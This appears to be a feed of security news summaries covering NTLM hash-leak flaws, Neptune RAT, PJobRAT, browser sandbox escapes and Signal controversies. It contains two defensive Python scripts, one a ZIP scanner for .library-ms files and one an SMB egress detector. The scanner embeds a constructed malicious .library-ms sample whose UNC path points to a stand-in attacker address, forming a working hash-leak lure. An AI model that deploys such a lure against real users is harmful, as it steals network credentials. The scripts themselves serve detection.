espionage

Winsage
April 17, 2025
Cybercriminals are exploiting a vulnerability in Windows systems known as CVE-2025-24054, an NTLM hash disclosure flaw that Microsoft classes as spoofing. It is triggered when a user extracts a ZIP archive containing a malicious .library-ms file: Windows Explorer resolves the UNC path embedded in that file and initiates an SMB authentication request to it, handing the attacker's server the user's Net-NTLMv2 (NTLMv2-SSP) challenge-response hash. That hash can be relayed to other services or cracked offline to recover the password (a captured NTLMv2 response is not directly usable for pass-the-hash), which enables privilege escalation and lateral movement within networks. Exploitation began shortly after Microsoft released a patch on March 11, 2025, with campaigns targeting government and private institutions in Poland and Romania. These campaigns used spear-phishing emails carrying malicious ZIP archives; the archives bundled several file types designed to initiate SMB connections to attacker-controlled servers, and leaked hashes as soon as the user interacted with them. The stolen hashes were sent to servers in several countries, suggesting possible links to state-sponsored groups. One campaign delivered the lure through Dropbox links, which exploited the vulnerability upon user interaction. Microsoft has recommended immediate patching, stronger network defenses (in practice, blocking outbound SMB on TCP 445 at the perimeter and restricting outgoing NTLM authentication), user education, network segmentation, and regular security audits to mitigate the risk.
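As an added example (not code from this page or from any of the researchers it cites), the following Python script shows the file-level check a defender can run on inbound ZIP attachments for this vulnerability: it parses each .library-ms member as XML, pulls out the <url> locations Explorer would resolve, and flags any that point at a remote host through a UNC path or a file/http URL. The sample archive, its member names and the 203.0.113.5 attacker address are all constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# A .library-ms file is XML in the Windows Library Description schema. The
# location Explorer resolves (and authenticates to) when the library is opened
# is the <url> inside <searchConnectorDescription><simpleLocation>.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Remote-location forms: UNC (\\host\share, \\?\UNC\host\share) and URLs
# (file://host/share, http(s)://host/... which Explorer hands to WebDAV).
_UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\]+)")
_URL_RE = re.compile(r"^(?:file|https?|webdav)://([^/\\]+)", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def remote_host(location):
    """Return the host a library location would be resolved against, or None for local paths."""
    text = location.strip()
    for rx in (_UNC_RE, _URL_RE):
        m = rx.match(text)
        if not m:
            continue
        host = m.group(1).rsplit("@", 1)[-1]      # drop user:pass@ in URL forms
        if not host.startswith("["):              # keep bracketed IPv6 literals intact
            host = host.split(":", 1)[0]          # drop :port
        return None if host.lower() in LOCAL_HOSTS else host
    return None


def library_ms_locations(xml_bytes):
    """Return every non-empty <url> in a .library-ms document, namespaced or not."""
    root = ET.fromstring(xml_bytes)
    tags = {"url", "{%s}url" % LIBRARY_NS}
    return [(el.text or "").strip() for el in root.iter()
            if el.tag in tags and (el.text or "").strip()]


def scan_zip(zip_bytes):
    """Return [(member, location, host)] for each remote location in any .library-ms member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                locations = library_ms_locations(zf.read(info))
            except ET.ParseError:
                # A library file we cannot parse still deserves a look; report it, don't skip it.
                findings.append((info.filename, "<unparseable>", None))
                continue
            for loc in locations:
                host = remote_host(loc)
                if host is not None:
                    findings.append((info.filename, loc, host))
    return findings


# Constructed samples (not files from the campaign). The attacker host uses the
# 203.0.113.0/24 documentation range.
MALICIOUS_LIBRARY_MS = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIBRARY_NS}">
  <name>Shared Documents</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\\\203.0.113.5\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

BENIGN_LIBRARY_MS = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIBRARY_NS}">
  <name>Public Documents</name>
  <version>1</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\\Users\\Public\\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_sample_zip():
    """Constructed archive shaped like the phishing lure: one benign and one malicious library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Documents.library-ms", BENIGN_LIBRARY_MS)
        zf.writestr("invoice.library-ms", MALICIOUS_LIBRARY_MS)
        zf.writestr("readme.txt", "constructed filler member")
    return buf.getvalue()


if __name__ == "__main__":
    for member, location, host in scan_zip(build_sample_zip()):
        print(f"{member}: points at {location} (host {host})")
```

Run it as-is to scan the built-in sample, or feed scan_zip() the bytes of a quarantined attachment. Anything it flags is a file that will make Explorer authenticate to the listed host as soon as the user handles it, so the host belongs on a block list and the recipient's NTLM hash should be treated as exposed (the password is now a cracking target and should be rotated).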
AppWizard
April 9, 2025
The Austrian government has introduced a draft law to increase oversight of messaging apps like WhatsApp and Telegram, aiming to aid law enforcement in monitoring potential terrorist and extremist activities. Interior Minister Gerhard Karner stated that police currently lack visibility into the actions of such individuals on these platforms, highlighting the need for specific measures that would only apply to a limited number of cases annually. Access to messaging services would be granted only in situations that suggest terrorist-related or constitution-threatening activities. The initiative received support from State Secretary Jörg Leichtfried of the Social Democratic Party, who assured that it would not lead to mass surveillance. However, there are concerns from the liberal NEOS party regarding the proposal, indicating the need for further discussions. An eight-week review period has been established for the draft law, during which the involved parties will engage with each other.
Winsage
April 8, 2025
Cybercriminals have released a new malware strain called Neptune RAT, which targets Windows PCs and can steal cryptocurrency and passwords as well as hold data for ransom. It features a crypto clipper that swaps cryptocurrency wallet addresses copied to the clipboard, a password-stealing function covering over 270 applications, and ransomware capabilities that lock files until a ransom is paid. The malware can disable antivirus software, monitor the victim's screen in real time, and wipe a PC. It is distributed through platforms like GitHub, Telegram, and YouTube, and researchers describe it as difficult to analyze. Users are advised to be cautious with downloads, consider identity theft protection services, and practice safe browsing habits to mitigate risks.
AppWizard
March 28, 2025
Recent research from cybersecurity firm Sophos has identified the use of PJobRAT malware against users in Taiwan through instant messaging applications named SangaalLite and CChat, which mimic legitimate platforms. The malicious apps were available for download from several WordPress sites that have since been taken offline. PJobRAT, an Android remote access trojan first identified in 2019, steals SMS messages, contacts, device information, documents, and media files. The latest cyber-espionage campaign lasted nearly two years and affected a limited number of users, indicating a targeted approach. The newest version of PJobRAT drops the ability to steal WhatsApp messages but gives attackers greater control over infected devices. How victims were led to the download sites remains unclear; previous campaigns relied on third-party app stores and phishing pages. Upon installation, the apps request extensive permissions and provide only basic chat functionality. Sophos researchers note that threat actors often refine their tooling between campaigns, suggesting the risk is ongoing.
Winsage
March 28, 2025
A newly disclosed zero-day vulnerability in Windows allows attackers to steal NTLM credentials when a user merely views (previews) a malicious file in Windows Explorer: Windows sends the user's NTLM hash to an attacker-controlled server, where it can be relayed or cracked offline. The flaw affects multiple Windows versions, from Windows 7 through Windows 11 24H2, and Microsoft has not yet issued a patch, leaving millions of users exposed. It was reported by security researcher Mitja Kolsek of ACROS Security, who noted that stolen credentials could lead to unauthorized access to networks. ACROS Security has released a temporary micro-patch through its 0patch platform, which users are encouraged to apply until an official fix ships. Separately, a zero-day vulnerability in Google Chrome and other Chromium-based browsers allows attackers to bypass the sandbox with a single click on a malicious link; it has been used primarily against media organizations and government agencies in Russia. Users are advised to install the 0patch fix, avoid interacting with unfamiliar files, and update their browsers to protect against these threats.
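Both this entry and the CVE-2025-24054 entry above come down to the same observable on the wire: a workstation opening an SMB connection to a host outside the organisation. The Python below, an added example rather than code from the page, 0patch or ACROS, runs that egress check over a few constructed Zeek-style connection records and reports each internal source that spoke SMB to an external address. The internal ranges, the log format and every address in the sample are assumptions made for the demonstration.

```python
import ipaddress
from collections import Counter, defaultdict

# Address ranges this (hypothetical) organisation treats as internal. Listed
# explicitly rather than using ipaddress.is_global, which would also classify
# the documentation addresses in the sample below as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "::1/128",
)]

# Ports Explorer connects to when it resolves an attacker-supplied UNC path.
# (With the WebClient service running, http(s) URLs go out over WebDAV on
# 80/443 instead; catching those needs proxy logs with the HTTP method,
# not just a port filter.)
SMB_PORTS = {445, 139}

# Constructed Zeek-style conn records: "ts src dst dport proto".
SAMPLE_CONN_LOG = """\
1743100000.101 10.0.5.23 10.0.5.10 445 tcp
1743100001.202 10.0.5.23 203.0.113.5 445 tcp
1743100002.303 10.0.5.41 198.51.100.9 139 tcp
1743100003.404 10.0.5.41 10.0.5.10 445 tcp
1743100004.505 10.0.5.23 203.0.113.5 445 tcp
1743100005.606 10.0.5.77 192.0.2.200 443 tcp
not a log line
"""


def is_internal(addr):
    """True if addr (str or ip_address object) falls in one of the internal ranges."""
    ip = ipaddress.ip_address(addr) if isinstance(addr, str) else addr
    return any(ip in net for net in INTERNAL_NETS)


def parse_conn_line(line):
    """Parse one 'ts src dst dport proto' record; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, src, dst, dport, proto = parts
    try:
        return {"ts": float(ts), "src": ipaddress.ip_address(src),
                "dst": ipaddress.ip_address(dst), "dport": int(dport), "proto": proto}
    except ValueError:
        return None


def find_smb_egress(log_text):
    """Map each internal source to {(dst, dport): count} for SMB connections to external hosts."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_conn_line(line)
        if rec is None or rec["proto"] != "tcp" or rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits[str(rec["src"])][(str(rec["dst"]), rec["dport"])] += 1
    return {src: dict(c) for src, c in hits.items()}


if __name__ == "__main__":
    for src, dests in find_smb_egress(SAMPLE_CONN_LOG).items():
        for (dst, port), n in dests.items():
            print(f"{src} -> {dst}:{port} x{n}  (possible NTLM hash leak)")
```

The host-side counterpart is to block outbound TCP 445 at the perimeter and to set the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to deny (or to audit first). A micro-patch closes one file-type trigger; the network and policy controls close the whole class, including triggers not yet disclosed.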
AppWizard
March 28, 2025
Some Democrats are claiming that the unintentional inclusion of a journalist in a Trump administration group chat about a military operation in Yemen may be criminal, with legal experts suggesting it could breach the Espionage Act. The chat took place on Signal and involved high-ranking national security officials, including Defense Secretary Pete Hegseth, who reportedly shared details about imminent military strikes. The Department of Defense prohibits sharing non-public information through messaging apps, and the Pentagon later warned of vulnerabilities in Signal that could be exploited by Russian hackers. House Speaker Mike Johnson called the use of Signal a "mistake," while several Democrats, including Sen. Elizabeth Warren and Rep. Jim Himes, expressed outrage and called for accountability. Legal experts stated that the chat likely violated the Espionage Act due to potential gross negligence in handling sensitive information. Despite the serious implications, there is skepticism about any prosecution occurring against those involved. The use of Signal raises concerns regarding compliance with federal open-records laws, as messages can be automatically deleted.
Winsage
March 28, 2025
Mozilla released Firefox 136.0.4 to address a critical security vulnerability, CVE-2025-2857, which could allow attackers to escape the browser's sandbox on Windows. The flaw, identified by Mozilla developer Andrew McCreight in the browser's IPC code, lets a compromised child process obtain an unintentionally powerful handle from the parent process and break out of the sandbox; it affects both standard and extended support releases, and Mozilla fixed it in Firefox 136.0.4 and in Firefox ESR 115.21.1 and 128.8.1. The bug follows the same pattern as a recent Google Chrome zero-day, CVE-2025-2783, which was used in cyber-espionage campaigns against Russian entities. Mozilla previously addressed another zero-day, CVE-2024-9680, exploited by the RomCom cybercrime group to achieve code execution inside Firefox's sandbox, and in March 2024 it patched two zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2024 hacking competition.
AppWizard
March 27, 2025
Pentagon officials issued a warning about the Signal messaging application after The Atlantic Editor-in-Chief Jeffrey Goldberg was inadvertently included in a group chat with high-ranking Trump administration officials discussing sensitive military strategies, including potential airstrikes in Yemen. An email disclosed a "vulnerability" in Signal, stating that the app is a target for Russian hacking groups that exploit its "linked devices" feature to monitor conversations. The email advised against using Signal for storing nonpublic unclassified information, although it can be used for "unclassified accountability/recall exercises." President Trump and Senators Mark Warner and Angus King commented on the situation, with concerns raised about the potential risks to national security. The administration is reviewing the incident, but no officials have indicated plans to resign.